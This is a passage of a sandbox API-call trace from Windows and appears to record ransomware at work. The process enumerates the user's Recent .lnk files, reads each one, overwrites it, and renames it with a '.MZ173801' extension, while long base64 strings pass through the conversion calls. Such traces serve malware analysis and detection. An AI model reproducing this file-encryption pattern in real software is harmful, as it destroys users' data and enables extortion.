lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.598] GetCurrentThreadId () returned 0x1358 [0109.598] GetCurrentThreadId () returned 0x1358 [0109.598] GetCurrentThreadId () returned 0x1358 [0109.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.599] GetCurrentThreadId () returned 0x1358 [0109.599] GetCurrentThreadId () returned 0x1358 [0109.599] GetCurrentThreadId () returned 0x1358 [0109.599] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ky0-S969NuCh.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ky0-s969nuch.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.599] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.599] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.599] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x54e [0109.599] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.600] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x54e, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x54e, lpOverlapped=0x0) returned 1 [0109.600] CloseHandle (hObject=0x3f4) returned 1 [0109.600] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ky0-S969NuCh.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ky0-s969nuch.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.601] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x54e, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x54e, lpOverlapped=0x0) returned 1 [0109.602] CloseHandle (hObject=0x3f4) returned 1 [0109.608] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ky0-S969NuCh.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ky0-s969nuch.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ky0-S969NuCh.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ky0-s969nuch.lnk.mz173801")) returned 1 [0109.608] GetCurrentThreadId () returned 0x1358 [0109.608] GetCurrentThreadId () returned 0x1358 [0109.608] GetCurrentThreadId () returned 0x1358 [0109.608] GetCurrentThreadId () returned 0x1358 [0109.608] GetCurrentThreadId () returned 0x1358 [0109.608] GetCurrentThreadId () returned 0x1358 [0109.608] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x739e4c75, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x739e4c75, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x739e4c75, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="MkfvC5YVoY.lnk", cAlternateFileName="MKFVC5~1.LNK")) returned 1 [0109.608] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.608] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.608] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MkfvC5YVoY.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mkfvc5yvoy.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x739e4c75, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x739e4c75, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x739e4c75, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4c4)) returned 1 [0109.609] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.609] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.609] GetCurrentThreadId () returned 0x1358 [0109.609] GetCurrentThreadId () returned 0x1358 [0109.609] GetCurrentThreadId () returned 0x1358 [0109.610] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.614] GetCurrentThreadId () returned 0x1358 [0109.614] GetCurrentThreadId () returned 0x1358 [0109.614] GetCurrentThreadId () returned 0x1358 [0109.614] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MkfvC5YVoY.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mkfvc5yvoy.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.615] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.615] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.615] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4c4 [0109.615] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.615] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x4c4, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x4c4, lpOverlapped=0x0) returned 1 [0109.616] CloseHandle (hObject=0x3f4) returned 1 [0109.616] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MkfvC5YVoY.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mkfvc5yvoy.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.617] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x4c4, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x4c4, lpOverlapped=0x0) returned 1 [0109.617] CloseHandle (hObject=0x3f4) returned 1 [0109.618] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MkfvC5YVoY.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mkfvc5yvoy.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MkfvC5YVoY.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mkfvc5yvoy.lnk.mz173801")) returned 1 [0109.619] GetCurrentThreadId () returned 0x1358 [0109.619] GetCurrentThreadId () returned 0x1358 [0109.619] GetCurrentThreadId () returned 0x1358 [0109.619] GetCurrentThreadId () returned 0x1358 [0109.619] GetCurrentThreadId () returned 0x1358 [0109.619] GetCurrentThreadId () returned 0x1358 [0109.619] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea97eea1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea97eea1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea97eea1, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x5fa, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="mmI1-6XkHu4NPFT8JK.lnk", cAlternateFileName="MMI1-6~1.LNK")) returned 1 [0109.619] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.619] FileTimeToDosDateTime (in: 